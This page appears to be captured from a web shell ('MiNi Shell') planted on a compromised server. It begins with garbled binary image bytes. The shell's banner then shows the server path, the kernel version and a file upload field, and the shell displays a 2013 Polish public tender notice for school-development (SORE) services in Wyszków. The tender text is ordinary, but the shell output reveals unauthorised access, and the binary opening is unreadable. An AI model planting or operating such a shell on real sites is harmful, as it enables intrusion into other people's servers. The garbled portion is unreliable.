JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130911/368084-N-2013.html

<p class="kh_header"><b>Wyszków: Pełnienie funkcji Szkolnego Organizatora Rozwoju Edukacji w projekcie pn.Od diagnozy do metamorfozy - profesjonalne wsparcie szkół w powiecie wyszkowskim</b><br>
<b>Numer ogłoszenia: 368084 - 2013; data zamieszczenia: 11.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poradnia Psychologiczno-Pedagogiczna w Wyszkowie , ul. Kościuszki 52, 07-200 Wyszków, woj. mazowieckie, tel. 29 742 50 07, faks 29 742 50 07.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Szkolnego Organizatora Rozwoju Edukacji w projekcie pn.Od diagnozy do metamorfozy - profesjonalne wsparcie szkół w powiecie wyszkowskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji Szkolnego Organizatora Rozwoju Edukacji (SORE) w projekcie Od diagnozy do metamorfozy - profesjonalne wsparcie szkół w powiecie wyszkowskim realizowanym przez Powiat Wyszkowski-Poradnię Psychologiczno-Pedagogiczną w Wyszkowie, współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Działania 3.5. Kompleksowe wspomaganie rozwoju szkół, Programu Operacyjnego Kapitał Ludzki. Szkolny Organizator Rozwoju Edukacji (SORE) jest zewnętrznym specjalistą, który pracuje na rzecz 7-9 szkół-przedszkoli w ramach realizowanego w powiecie projektu wdrożeniowego (Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół). Usługa wykonywana będzie na podstawie umowy zawartej w trybie zamówienia publicznego w okresie IX 2013 r. - VI 2014 r. następnie IX 2014 r. - VII 2015 r. (ogółem 21 miesięcy). Szacunkowa ilość godzin dla każdego SORE: 80 godzin miesięcznie. Głównym zdaniem SORE jest przygotowanie i realizacja wraz z dyrektorem i nauczycielami  rocznego planu wspomagania (RWP) zbudowanego na podstawie wybranej przez szkołę-przedszkole oferty doskonalenia (przygotowanej w ramach projektu System doskonalenia nauczycieli oparty na ogólnodostępnym kompleksowym wspomaganiu szkół). Po uruchomieniu projektu SORE nawiązuje kontakt ze szkołą-przedszkolem, buduje relacje z dyrektorem i radą pedagogiczną. Współpracuje z dyrektorem i radą pedagogiczną w przeprowadzeniu diagnozy i konstruowaniu rocznego planu wspomagania. Odpowiada za prawidłową organizację działań związanych z zewnętrznym wspomaganiem. Pozostaje w stałym kontakcie z dyrektorem i pracownikami zaangażowanymi w realizację rocznego planu wspomagania. Wspiera nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur. Swoje działania realizuje bezpośrednio w szkole/przedszkolu, które wspiera. Zamawiający podzielił przedmiot zamówienia na części w zależności od obszaru wykonywanych czynności (lokalizacji szkół, przedszkoli), tj.: Część 1 Pełnienie funkcji szkolnego organizatora rozwoju edukacji - SORE 2 - miasto Wyszków, gmina Rząśnik, Część 2 Pełnienie funkcji szkolnego organizatora rozwoju edukacji - SORE 4 - miasto Wyszków, gmina Zabrodzie, Część 3 Pełnienie funkcji szkolnego organizatora rozwoju edukacji - SORE 6 - miasto Wyszków, gmina Długosiodło. Zamawiający zastrzega sobie prawo zmiany obszaru działania SORE. W przypadku rezygnacji szkoły-przedszkola w udziału w projekcie zasady doboru kolejnej szkoły-przedszkola określa regulamin rekrutacji i uczestnictwa w przedmiotowym projekcie. Wykonawca - SORE zatrudniony będzie na podstawie umowy zlecenia. Wykonawców obowiązuje należyta staranność w wykonywaniu przedmiotu zamówienia. Zamawiający w zakresie realizacji projektu udostępni pomieszczenia, sprzęt komputerowy z dostępem do Internetu i meble oraz podstawowe materiały biurowe do druku i korespondencji celem należytego wykonania umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie części nr 1,2 i 3 osoba wskazana do pełnienia funkcji Szkolnego Organizatora Rozwoju Edukacji musi: 1) Posiada wykształcenie wyższe II stopnia z przygotowaniem pedagogicznym. 2) Posiada stopień awansu zawodowego nauczyciela mianowanego lub dyplomowanego. 3) Posiada niezbędną wiedzę i co najmniej 2 letnie doświadczenie w moderowaniu grupowej pracy koncepcyjnej osób dorosłych, np. kierowaniu spotkaniami, warsztatami poświęconymi zespołowemu wypracowaniu rozwiązań określonych problemów środowiska oświatowego, prowadzeniu rad pedagogicznych szkoleniowych, warsztatów metodycznych, szkolnych zespołów przedmiotowych lub zadaniowych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oswiadczenie Wykonawcy, na podstawie art. 22u.z.p. o spełnianiu warunków udziału w niniejszym postepowaniu - w formularzu ofertowym. 2. w przypadku gdy Wykonawca polega na wiedzy i doświadczeniu innych podmiotów, niezaleznie od charakteru prawnego łączących go z nim stosunków zobowiązany jest udowodnic zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia . W tym celu Wykonawca winien dołączyc do oferty w szczególnosci pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okre korzystania z nich przy wykonywaniu zamówienia. 3. Jeżeli Wykonawca wykazując spełnienie warunku o którym mowa w rozdziale V punkt 1 ppkt c, polega na zasobach innych podmiotów, zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw wykluczenia z postępowania o udzielenie zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)Zamawiający przewiduje możliwość dokonywania zmian w umowie. Zmiana umowy może być dokonana w granicach wyznaczonych przepisami ustawy, w tym art. 144 ustawy, wyłącznie za zgodą stron, w formie pisemnej pod rygorem nieważności. 2)Zmiany umowy mogą nastąpić w następujących przypadkach: 
a)Zaistnienia omyłki pisarskiej lub rachunkowej. b) Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy. c) Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, w tym zmiany ustawowej stawki podatku VAT.d) Wystąpienia niezależnych od Zamawiającego i Wykonawcy istotnych okoliczności, których nie można było przewidzieć przy zachowaniu należytej staranności, które mają wpływ na terminy realizacji zamówienia. e) Zmiany harmonogramów lub liczby godzin.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.ppp.powiat-wyszkowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poradnia Psychologiczno- Pedagogiczna w Wyszkowie
ul. Kościuszki 52
07-200 Wyszków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.09.2013 godzina 08:30, miejsce: Poradnia Psychologiczno- Pedagogiczna w Wyszkowie
ul. Kościuszki 52
07-200 Wyszków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonanie przedmiotu zamówienia współfinansowane przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytet IIIWysoka jakość systemu oświatyDziałanie 3.5 Kompleksowe wspomaganie rozwoju szkół Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji szkolnego organizatora rozwoju edukacji - SORE 2 - miasto Wyszków, gmina Rząśnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Dokonanie wraz z Dyrektorami i Radami Pedagogicznymi diagnozy potrzeb 7-9 szkół-przedszkoli (w każdej szkole-przedszkolu: wywiad z dyrektorem i nauczycielami, spotkanie z radą pedagogiczną, warsztat diagnostyczno-rozwojowy dla zespołu wyłonionego z rady pedagogicznej) - IX-X 2013. 2. Dostosowanie ofert doskonalenia nauczycieli do zdiagnozowanych potrzeb i opracowanie wraz z Dyrektorem i Radą Pedagogiczną każdej z 7-9 szkół-przedszkoli dwóch Rocznych Planów Wspomagania (RPW) zawierających: tematy ofert doskonalenia, harmonogram realizacji, formy doskonalenia, wskaźniki realizacji, role i zadania osób realizujących RPW oraz korzystających ze wsparcia i przekazanie ich Asystentowi-tce koordynatora projektu - do 10 XI 2013 r. 3. Organizacja (we współpracy z Dyrektorem każdej z 7-9 szkół-przedszkoli oraz Zespołem Projektowym) i monitorowanie zaplanowanych form wspomagania  - pierwsza oferta XI 2013 r. - VI 2014 r., druga oferta IX 2014 r. - VI 2015 r., m.in.: spotkania z dyrektorem szkoły i radą pedagogiczną, sporządzenie harmonogramu szkoleń, warsztatów, konsultacji,organizacja szkoleń, warsztatów, konsultacji (dbałość o zapewnienie miejsca, materiałów szkoleniowych, cateringu),wnioskowanie o pozyskanie zewnętrznych ekspertów,przygotowanie szczegółowej specyfikacji technicznej do zamówień publicznych na ekspertów 
i przekazanie ich Asystentowi/tce koordynatora projektu,udział w pozyskiwaniu ekspertów do współpracy w realizacji zaplanowanych form doskonalenia, przygotowanie i przeprowadzenie wśród uczestników ankiet z przebiegu wspomagania,dokumentowanie prowadzonych działań (listy obecności, karty konsultacji, ankiety, etc.). 4. Wsparcie szkoły we wdrożeniu do praktyki szkolnej nowych umiejętności nabytych w ramach ofert doskonalenia. 5. Opracowanie sprawozdań i raportów ewaluacyjnych z realizacji Rocznego Planu Wspomagania (pierwszy obszar wsparcia V-VI2014 oraz V-VI2015 - drugi obszar wsparcia szkoły) i przekazanie ich Specjaliście-stce ds. monitoringu i sprawozdawczości projektu. 6. Stała współpraca z Zespołem Projektowym w zakresie realizacji i promocji w/w projektu oraz sprawozdawczości merytorycznej. 7.Stała współpraca z Dyrektorami przydzielonych szkół w zakresie realizacji projektu, z uwzględnieniem organizacji pracy danej szkoły. 8 Uczestnictwo w spotkaniach i szkoleniach dotyczących realizacji w/w projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji szkolnego organizatora rozwoju edukacji - SORE 4 - miasto Wyszków, gmina Zabrodzie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Dokonanie wraz z Dyrektorami i Radami Pedagogicznymi diagnozy potrzeb 7-9 szkół-przedszkoli (w każdej szkole-przedszkolu: wywiad z dyrektorem i nauczycielami, spotkanie z radą pedagogiczną, warsztat diagnostyczno-rozwojowy dla zespołu wyłonionego z rady pedagogicznej) - IX-X 2013. 2. Dostosowanie ofert doskonalenia nauczycieli do zdiagnozowanych potrzeb i opracowanie wraz z Dyrektorem i Radą Pedagogiczną każdej z 7-9 szkół-przedszkoli dwóch Rocznych Planów Wspomagania (RPW) zawierających: tematy ofert doskonalenia, harmonogram realizacji, formy doskonalenia, wskaźniki realizacji, role i zadania osób realizujących RPW oraz korzystających ze wsparcia i przekazanie ich Asystentowi-tce koordynatora projektu - do 10 XI 2013 r. 3. Organizacja (we współpracy z Dyrektorem każdej z 7-9 szkół-przedszkoli oraz Zespołem Projektowym) i monitorowanie zaplanowanych form wspomagania  - pierwsza oferta XI 2013 r. - VI 2014 r., druga oferta IX 2014 r. - VI 2015 r., m.in.: spotkania z dyrektorem szkoły i radą pedagogiczną, sporządzenie harmonogramu szkoleń, warsztatów, konsultacji,organizacja szkoleń, warsztatów, konsultacji (dbałość o zapewnienie miejsca, materiałów szkoleniowych, cateringu),wnioskowanie o pozyskanie zewnętrznych ekspertów,przygotowanie szczegółowej specyfikacji technicznej do zamówień publicznych na ekspertów 
i przekazanie ich Asystentowi/tce koordynatora projektu,udział w pozyskiwaniu ekspertów do współpracy w realizacji zaplanowanych form doskonalenia, przygotowanie i przeprowadzenie wśród uczestników ankiet z przebiegu wspomagania,dokumentowanie prowadzonych działań (listy obecności, karty konsultacji, ankiety, etc.). 4. Wsparcie szkoły we wdrożeniu do praktyki szkolnej nowych umiejętności nabytych w ramach ofert doskonalenia. 5. Opracowanie sprawozdań i raportów ewaluacyjnych z realizacji Rocznego Planu Wspomagania (pierwszy obszar wsparcia V-VI2014 oraz V-VI2015 - drugi obszar wsparcia szkoły) i przekazanie ich Specjaliście-stce ds. monitoringu i sprawozdawczości projektu. 6. Stała współpraca z Zespołem Projektowym w zakresie realizacji i promocji w/w projektu oraz sprawozdawczości merytorycznej. 7.Stała współpraca z Dyrektorami przydzielonych szkół w zakresie realizacji projektu, z uwzględnieniem organizacji pracy danej szkoły. 8 Uczestnictwo w spotkaniach i szkoleniach dotyczących realizacji w/w projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pełnienie funkcji szkolnego organizatora rozwoju edukacji - SORE 6 - miasto Wyszków, gmina Długosiodło.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Dokonanie wraz z Dyrektorami i Radami Pedagogicznymi diagnozy potrzeb 7-9 szkół-przedszkoli (w każdej szkole-przedszkolu: wywiad z dyrektorem i nauczycielami, spotkanie z radą pedagogiczną, warsztat diagnostyczno-rozwojowy dla zespołu wyłonionego z rady pedagogicznej) - IX-X 2013. 2. Dostosowanie ofert doskonalenia nauczycieli do zdiagnozowanych potrzeb i opracowanie wraz z Dyrektorem i Radą Pedagogiczną każdej z 7-9 szkół-przedszkoli dwóch Rocznych Planów Wspomagania (RPW) zawierających: tematy ofert doskonalenia, harmonogram realizacji, formy doskonalenia, wskaźniki realizacji, role i zadania osób realizujących RPW oraz korzystających ze wsparcia i przekazanie ich Asystentowi-tce koordynatora projektu - do 10 XI 2013 r. 3. Organizacja (we współpracy z Dyrektorem każdej z 7-9 szkół-przedszkoli oraz Zespołem Projektowym) i monitorowanie zaplanowanych form wspomagania  - pierwsza oferta XI 2013 r. - VI 2014 r., druga oferta IX 2014 r. - VI 2015 r., m.in.: spotkania z dyrektorem szkoły i radą pedagogiczną, sporządzenie harmonogramu szkoleń, warsztatów, konsultacji,organizacja szkoleń, warsztatów, konsultacji (dbałość o zapewnienie miejsca, materiałów szkoleniowych, cateringu),wnioskowanie o pozyskanie zewnętrznych ekspertów,przygotowanie szczegółowej specyfikacji technicznej do zamówień publicznych na ekspertów 
i przekazanie ich Asystentowi/tce koordynatora projektu,udział w pozyskiwaniu ekspertów do współpracy w realizacji zaplanowanych form doskonalenia, przygotowanie i przeprowadzenie wśród uczestników ankiet z przebiegu wspomagania,dokumentowanie prowadzonych działań (listy obecności, karty konsultacji, ankiety, etc.). 4. Wsparcie szkoły we wdrożeniu do praktyki szkolnej nowych umiejętności nabytych w ramach ofert doskonalenia. 5. Opracowanie sprawozdań i raportów ewaluacyjnych z realizacji Rocznego Planu Wspomagania (pierwszy obszar wsparcia V-VI2014 oraz V-VI2015 - drugi obszar wsparcia szkoły) i przekazanie ich Specjaliście-stce ds. monitoringu i sprawozdawczości projektu. 6. Stała współpraca z Zespołem Projektowym w zakresie realizacji i promocji w/w projektu oraz sprawozdawczości merytorycznej. 7.Stała współpraca z Dyrektorami przydzielonych szkół w zakresie realizacji projektu, z uwzględnieniem organizacji pracy danej szkoły. 8 Uczestnictwo w spotkaniach i szkoleniach dotyczących realizacji w/w projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com